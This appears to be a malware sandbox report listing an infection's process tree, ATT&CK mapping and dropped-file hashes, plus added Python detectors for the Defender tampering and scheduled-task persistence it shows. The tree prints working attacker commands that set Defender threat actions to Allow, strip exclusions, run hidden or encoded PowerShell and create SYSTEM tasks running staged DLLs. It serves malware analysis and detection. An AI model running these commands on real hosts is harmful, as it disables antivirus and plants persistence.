    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
-
[6] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
-
[6] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
-
[6] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
-
[6] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
-
[6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell start-process -WindowStyle Hidden gpupdate.exe /force
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
-
[7] C:\Windows\SysWOW64\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bKPbLIPtdWjYWtgKbM"
-
[3] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
-
[6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
-
[7] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
-
[4] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
-
[5] C:\Windows\SysWOW64\cmd.exe
    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
-
[6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
-
[7] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TGSqLNfOU\LMFzmB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rkutRMUCKyfxaPV" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "rkutRMUCKyfxaPV2" /F /xml "C:\Program Files (x86)\TGSqLNfOU\fojvEjJ.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "rkutRMUCKyfxaPV"
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "rkutRMUCKyfxaPV"
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ymGpHCUadFDCAu" /F /xml "C:\Program Files (x86)\jbywMxbyABuU2\eYEkLFX.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "KIJZzoLWERVEa2" /F /xml "C:\ProgramData\tvOexZGeSXRtrQVB\LBgNQcB.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "cKCvNSfFKKPlDebmW2" /F /xml "C:\Program Files (x86)\LarsEiwmjwuUJnPlqwR\cSuranC.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "kIVMXXvuSFGZiLTKXPV2" /F /xml "C:\Program Files (x86)\vZXYUjRGERiGC\uxeimXa.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
-
[3] C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "LyeaCXeAXIXykqmfO"
-
[3] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1272 -s 900
    - Program crash
-
[2] C:\Windows\system32\rundll32.EXE
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jLjeNaiUMFXhhNbk\ggohLDQv\DBirfQG.dll",#1 /rHdidW 385135
-
[3] C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jLjeNaiUMFXhhNbk\ggohLDQv\DBirfQG.dll",#1 /rHdidW 385135
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
-
[4] C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "WEqRGXvoovdTvsnPk"
-
[1] C:\Windows\system32\taskeng.exe
    taskeng.exe {22CB941E-8E62-4662-8CC9-46970B77C7C3} S-1-5-21-39690363-730359138-1046745555-1000:EILATWEW\Admin:Interactive:[1]
-
[2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
-
[3] C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
-
[1] C:\Windows\system32\gpscript.exe
    gpscript.exe /RefreshSystemParam
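The two forfiles chains above each write four threat IDs into the Defender policy key HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction with data 6, which in Defender's action encoding (the values Set-MpPreference -ThreatIDDefaultAction_Actions accepts) means Allow, then run gpupdate /force so the new policy is applied at once instead of at the next refresh; the later WMIC calls edit MSFT_MpPreference directly. The wrapper forfiles /p c:\windows\system32 /m <file> /c "cmd ..." is indirect command execution: the /m file always exists in System32, so the /c payload runs exactly once with forfiles.exe as its parent. The detector below is an added example, not code from the report or from the malware: it runs over (image, command line) records constructed from the tree, and the rule names, severities and regexes are this example's own choices.

```python
"""Flag the Windows Defender tampering seen in the process tree above.

Added example, not code from the sandbox report or from the malware. The
sample records are constructed from command lines in the tree; the rules
work on any (image_path, command_line) pairs, e.g. Sysmon Event ID 1 exports.
"""
import re

# Action codes of the ThreatIDDefaultAction policy, the same numbers that
# Set-MpPreference -ThreatIDDefaultAction_Actions accepts; 6 means Allow.
THREAT_ACTIONS = {
    "1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
    "8": "UserDefined", "9": "NoAction", "10": "Block",
}

# reg add against the policy key; quotes may be escaped (\") inside forfiles /c.
REG_ADD_RE = re.compile(
    r'reg\s+add\s+\\?"?HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender'
    r'\\Threats\\ThreatIDDefaultAction\\?"?.*?/v\s+(\d+).*?/d\s+(\d+)',
    re.IGNORECASE,
)
# WMI method calls on the Defender preference class (Add/Remove/Set ...).
MPPREF_RE = re.compile(r"MSFT_MpPreference\s+call\s+(\w+)\s+(\S+)", re.IGNORECASE)
# forfiles used as a launcher: /m names one file that is sure to exist in
# System32, so the /c command runs exactly once under forfiles' identity.
FORFILES_RE = re.compile(r'forfiles\s+/p\s+\S+\s+/m\s+(\S+)\s+/c\s+"cmd', re.IGNORECASE)
GPUPDATE_RE = re.compile(r'gpupdate(?:\.exe)?"?\s+/force', re.IGNORECASE)


def analyse(records):
    """records: iterable of (image_path, command_line). Returns a list of findings."""
    findings = []
    for image, cmdline in records:
        exe = image.rsplit("\\", 1)[-1].lower()
        if exe == "reg.exe":
            # Match reg.exe itself, not the cmd/forfiles wrappers, so one
            # registry write yields exactly one finding.
            m = REG_ADD_RE.search(cmdline)
            if m:
                threat_id, code = m.group(1), m.group(2)
                action = THREAT_ACTIONS.get(code, "unknown(%s)" % code)
                findings.append({
                    "rule": "defender_threat_action_policy",
                    "threat_id": threat_id, "action": action,
                    "severity": "high" if action in ("Allow", "NoAction") else "medium",
                })
        elif exe == "wmic.exe":
            m = MPPREF_RE.search(cmdline)
            if m:
                findings.append({"rule": "defender_preference_wmi",
                                 "method": m.group(1), "argument": m.group(2)})
        elif exe == "forfiles.exe":
            m = FORFILES_RE.search(cmdline)
            if m:
                findings.append({"rule": "forfiles_indirect_execution",
                                 "decoy_match": m.group(1)})
        elif exe == "gpupdate.exe" and GPUPDATE_RE.search(cmdline):
            findings.append({"rule": "gpupdate_force"})
    return findings


def allowed_threat_ids(findings):
    """Threat IDs whose default action is now Allow or NoAction."""
    return sorted(f["threat_id"] for f in findings
                  if f["rule"] == "defender_threat_action_policy"
                  and f["action"] in ("Allow", "NoAction"))


# Constructed from the process tree above (one chain of each kind).
SAMPLE_RECORDS = [
    (r"C:\Windows\SysWOW64\forfiles.exe",
     r'forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6'),
    (r"\??\c:\windows\SysWOW64\reg.exe",
     r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6'),
    (r"\??\c:\windows\SysWOW64\reg.exe",
     r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6'),
    (r"C:\Windows\SysWOW64\Wbem\WMIC.exe",
     r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True'),
    (r"C:\Windows\SysWOW64\gpupdate.exe", r'"C:\Windows\system32\gpupdate.exe" /force'),
    (r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign control record
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_RECORDS):
        print(finding)
    print("threat IDs set to Allow/NoAction:", allowed_threat_ids(analyse(SAMPLE_RECORDS)))
```

On a suspect host, Get-MpPreference | Select-Object ThreatIDDefaultAction_Ids, ThreatIDDefaultAction_Actions shows the effective per-threat overrides, and reading the policy key tells you whether they arrived through Group Policy; a Sysmon RegistryEvent (Event ID 13) rule on that key catches the write itself, whichever wrapper launched reg.exe.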
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- System Services (2): Service Execution (2)
- Scheduled Task/Job (1)
Persistence
- Create or Modify System Process (4): Windows Service (4)
- Boot or Logon Autostart Execution (2): Registry Run Keys / Startup Folder (2)
- Pre-OS Boot (1): Bootkit (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Create or Modify System Process (4): Windows Service (4)
- Boot or Logon Autostart Execution (2): Registry Run Keys / Startup Folder (2)
- Scheduled Task/Job (1)
Defense Evasion
- Modify Registry (5)
- Impair Defenses (3): Disable or Modify Tools (1), Disable or Modify System Firewall (1)
- Pre-OS Boot (1): Bootkit (1)
- Subvert Trust Controls (1): Install Root Certificate (1)
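The matrix credits Scheduled Task/Job under execution, persistence and privilege escalation; in the tree these are the schtasks /CREATE ... /RU "SYSTEM" calls, whose actions are either rundll32 of a DLL under C:\Windows\Temp or Program Files (x86), or a task definition XML under ProgramData or Program Files (x86), plus the one-shot (/SC once) tasks that are kicked with /run /I and deleted once their payload is running. The taskeng.exe child at the end of the tree runs powershell -EncodedCommand, which decodes (base64 of UTF-16LE) to the same start-process -WindowStyle Hidden gpupdate.exe /force used in the forfiles chains. The parser and decoder below are an added example, not code from the report or from the malware; the samples are copied from the tree, and the flag names and the staging-directory list are this example's own assumptions.

```python
"""Parse the schtasks persistence from the process tree above and decode the
PowerShell -EncodedCommand that the task engine (taskeng.exe) later runs.

Added example, not part of the sandbox report or of the malware. The command
lines are copied from the tree as constructed samples; the parser handles
generic schtasks.exe syntax and the decoder any -EncodedCommand argument.
"""
import base64
import re

# /SWITCH optionally followed by a value: a quoted string (with the \" escapes
# schtasks /TR uses) or a bare word that is not itself a switch.
SWITCH_RE = re.compile(r'/(\w+)(?:\s+("(?:\\.|[^"\\])*"|[^\s/]\S*))?')
# -EncodedCommand and its accepted abbreviations (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Directories this example treats as payload staging locations (assumption).
STAGING_DIRS = ("\\windows\\temp\\", "\\programdata\\", "\\appdata\\local\\temp\\")


def parse_schtasks(cmdline):
    """Map upper-cased switch names to their unquoted values (None if bare)."""
    switches = {}
    for m in SWITCH_RE.finditer(cmdline):
        value = m.group(2)
        if value is not None and value.startswith('"'):
            value = value[1:-1].replace('\\"', '"')
        switches[m.group(1).upper()] = value
    return switches


def triage_task(cmdline):
    """Summarise a schtasks /CREATE command line; None for /run, /DELETE, /END."""
    sw = parse_schtasks(cmdline)
    if "CREATE" not in sw:
        return None
    # /TR carries the action inline; /xml points at a task definition file
    # whose trigger and action are not visible on the command line.
    action = sw.get("TR") or "<xml> " + (sw.get("XML") or "")
    flags = []
    if (sw.get("RU") or "").upper() == "SYSTEM":
        flags.append("runs_as_system")
    if any(d in action.lower() for d in STAGING_DIRS):
        flags.append("path_in_staging_dir")
    if "rundll32" in action.lower():
        flags.append("rundll32_action")
    schedule = (sw.get("SC") or "").lower()
    if schedule == "once":
        flags.append("one_shot_schedule")  # run-now stager, deleted afterwards
    elif schedule == "onlogon":
        flags.append("logon_trigger")
    if "XML" in sw:
        flags.append("defined_by_xml")
    return {"name": sw.get("TN"), "run_as": sw.get("RU"),
            "action": action, "flags": flags}


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not base64 / not UTF-16
        return None


# Constructed samples: command lines copied from the process tree above.
SAMPLE_TASKS = [
    r'schtasks /CREATE /TN "WEqRGXvoovdTvsnPk" /SC once /ST 05:06:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jLjeNaiUMFXhhNbk\ggohLDQv\DBirfQG.dll\",#1 /rHdidW 385135" /V1 /F',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TGSqLNfOU\LMFzmB.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rkutRMUCKyfxaPV" /V1 /F',
    r'schtasks /CREATE /TN "KIJZzoLWERVEa2" /F /xml "C:\ProgramData\tvOexZGeSXRtrQVB\LBgNQcB.xml" /RU "SYSTEM"',
    r'schtasks /run /I /tn "WEqRGXvoovdTvsnPk"',
    r'schtasks /DELETE /F /TN "WEqRGXvoovdTvsnPk"',
]
ENCODED_SAMPLE = (
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden '
    '-EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=='
)

if __name__ == "__main__":
    for line in SAMPLE_TASKS:
        print(triage_task(line))
    print(decode_encoded_command(ENCODED_SAMPLE))
```

For the XML-defined tasks the command line shows neither trigger nor action; schtasks /Query /TN <name> /XML on the host, or the task file under C:\Windows\System32\Tasks, gives both.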
Downloads
-
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpiFilesize
2.0MB
MD57e136fd239e52e3d0e54d291eeb533d1
SHA18875b7433b406087d02c33b5c1b85944916b8dfd
SHA256c029439ac2e38c4b31993b793022f17be781000fb06a059039234de3c0b42741
SHA51295174d414b01f474dfdcceddf865fc6ee92599d8449fcb55f74e1fffa73338e9314976011e99dc3d129cb53b2319e40e1624a94bd1bf4130ab95a17ee5fc2a07
-
C:\ProgramData\BFHJECAAAF.exeFilesize
740KB
MD5d9da4e934cfed81304e5fe2d43f4fc5e
SHA14ea331a79dc631f35e73d7a0e374fc9be6181df1
SHA2567cf82df6cafe847f47b73ba110f009d277f09d82a73758959e1b9598055ed78f
SHA512f25ece36c23329791f9c1e4efb1fa05458fb3fde4567c01c680b9b4c4e67e60bc51f7e5d6ae0157be1d103c7b91cdcddacc8ffd10116d7cdeda1396a1b1644e0
-
C:\ProgramData\DBKKFHIEGD.exeFilesize
1.8MB
MD57fc744e8d5f2c7c533dd995a5d0c1d30
SHA1f8220ea06b9c3e5d31a203f63787bd502780f33c
SHA25600bb335318bc7964d7d8f58e4e3688d340431a5f38998ee257898c88874b0797
SHA512c3a96071bdabaaca5689f11c14505d0d4bd8f877a7aaf6ce5b376db46cd589819bf810c68f704197a9a91b7ce46217e7a05c3f86b7d64cd61a7a367178e68aeb
-
C:\ProgramData\HIIEBAFCBKFI\IIJDBGFilesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD5de9a6aac46ba85a6044d31a957710959
SHA1077284fee0ef623be8c657e7543edc69e7a993ed
SHA25643f762b8facc692c9ded79bd585da945ef1cef70b6132a85406c36b3c5d0a90f
SHA51290de83e3a636263e3051cb6118f862858b31b7edfca00c56e837e9925238d907e26ee830eb60542d3314cf432ec982c1e2f6add4134c2c2872e6b4a27661e074
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD55efe1a558ce875505fb139848064344f
SHA107cde54a48d84fdc1473f5796a3822dbc72ccbf5
SHA256ad7756a7fe1fd9d5358512b5c721f1580c7cb4e50820877aa416e79d6f2cb1f3
SHA5124dfe4a99e3cb4d401665df493d7fb74fdca10766b2d1c48aaa1a24e91d8e0b5c679ee0227b2165b3fe76696519ae09bb7d2c075f95b31ebeb97340fff4e967bc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD5f53614b6bc0c9c195a9fd8f37d4ae78e
SHA1202caba16ea424b5d0187f5cb0e2553cba3546c9
SHA256e9b6f7933836b4c5129ad7eedd6d1b9a78dd3e12617841af7b94a4ffe0e7c676
SHA5126288738168a604f5a645239d8e441aa490046edccda3c800322dd9fffa229a2e9ce0e4c902b363202245ee988ba538372d29370f84baa3ba251d727f34ddc768
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD5e9a44260f335738cf6cf71d0a363f621
SHA1fe9526612efd913b5765d0dfcdf04c7d3ffa3903
SHA256146d1e4e9d9215404fde14f89b3d973b65f52240d003e8120b7af9b84f6e977c
SHA512e512511cb176175b1ff8a37ff1afdf8b3291b00bbfbc1a57fa673812b7b79edf35cbd51e7f7de64eb38f5ae5ceb616cd300c0cb7e5d55095b6e3c2aca5cc6873
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD5bf3a72a678fd3f3febf103a0f98c1b9c
SHA158359046e858977610d78b8d10ff73051dcd1bb0
SHA256844ef0865598405c6cf7a16d6fac5ab4a0aab2320cc386cc35dad9b7eb0af0cf
SHA51292fac5efdb2e4af50097d6d8b6c05f00b4c11ab45f0e8a3236af3670192fcce78b649031e73384870ac9887071d207be4f4ebaec67b451d37f6ea96afbdaaa43
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD512f221db250ecf9063b882b9a891baa3
SHA1b5cbd04a4b0cddcddbce0e2e847682355f05280e
SHA2564b28d303f1e6205c6222502fdd9dcfb982134d20736daa94ff2e66ed95280960
SHA51206954a40f940f9c80736f8d6f22498192ded4588318f66c6a7aa00d396d7fdd374779a14e62c33e2557ce4b91608749270e5a62b0815a877c56f7276774f6384
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD54ef411db3216700b05329ba6d0da886b
SHA1001f52ceb34c87b1e3557bf36e5cbb3819685946
SHA25655d9664f2f40b90b4ecbbee2b0f78aabd2ff55a6c2825d648aae5405283479c1
SHA51256d4fdf2bd956e8c9e98104736cd5bd711b0668734a3d464860caa061379717f5aac8e39fbbbdfc815e0a7fa79d9805debe741a26df429a6f1d4e2d53b339771
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD571e6d0f4f0ef949540dc15db05aed251
SHA17ccf142663f9bf898c4bf6fa4211cdc4dfcf5b9a
SHA2560ed0259324249b487ab6126eafac712131d9c328ec6e76a88946090985ba0ee7
SHA5129206d652e3a27cb1652fd1c3e65bb7cfd7c93ac10db56d0c2e459e761c0596f2242aafdc0074f60c9bbd02df40aad151cc270570a6fd41de04b900f89dee893c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD5197f81e9436c10ec4d2a952bd6905d96
SHA163b28dcc2cb87871a2e68f968336b495266cc77d
SHA256437bba90641066711e47d5b1fc1e5cb13074b9b01f7b9e332942d728deee4350
SHA5120df862c16dcf7a0a4286fa99a19f81dfa7b7ab38795aca6e45c44658bb05bbb0e1a5433a79e90808fb0238f36d60aa05ff489a368c13de92c1e6d795ab698c5d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD5034a37ed9ede9e633e3dbd37485294a1
SHA1ae3994d92ca498b95014f25e23c6ac83b6cac53d
SHA2562c602aee82842627f0d3578ccb9ae856d962f5cb3dd77f902599a1c473134a9b
SHA5125f30c8b73b1fac0202490efe1f5e5f542200ba40f51dc53298c7005a8be51b739ae650e58f40e6b401b15ba3db85007d582e6bae2d9bb6ee23b043efab7fe35f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD537c1ce96b4f3c1edbe7faaa725cdeb90
SHA1fb200e53464a95bd6db0b4dcc922c6b447f4fb77
SHA256954629b5460cd1da423e9b743600c3ae6537afab5b4991ad4864d092f4377ea2
SHA512c86b95bbbf9e80e093d2eb9923ce813146766fdc4050ab2fc36678411846cc885260e0cd1a1b7b3daf64e8609e7447f2f9fcb012536e14b09edef7bded8e5d80
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
342B
MD55267c68126d30b0bf0307aaf4344f6fa
SHA127eeea84999842275471a5ff6d5c5e9782dc6fd2
SHA25645c2ee2858d97a909b80c5ab02bfaba84758784e3380023b8dd2d28fc593f2be
SHA512d813a0a0aa6b90b30259b283d56ca1b03a2eb9f4cdef1e6cf145fe3af109ed1f4087d9bc14ef2ec878563f5990fe6150055612c3161cd1b24cf1636bf5b5da27
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.jsonFilesize
187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
